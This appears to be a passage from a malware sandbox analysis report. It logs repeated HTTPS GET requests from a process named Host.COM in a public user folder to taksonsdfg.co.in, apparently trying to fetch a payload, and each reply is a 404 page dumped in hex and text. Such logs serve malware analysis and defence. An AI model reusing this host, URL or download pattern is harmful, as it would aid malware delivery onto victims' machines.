                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.449777108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:41 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:42 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:41 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:42 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:42 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.449779108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:42 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:43 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:43 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:43 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:43 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.449781108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:44 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:44 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:44 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:44 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:44 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.449783108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:45 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:45 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:45 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:45 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:45 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.449785108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:46 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:46 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:46 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:46 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:46 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.449787108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:47 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:47 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:47 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:47 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:47 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.449789108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:48 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:48 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:48 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:48 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:48 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.449791108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:49 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:50 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:49 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
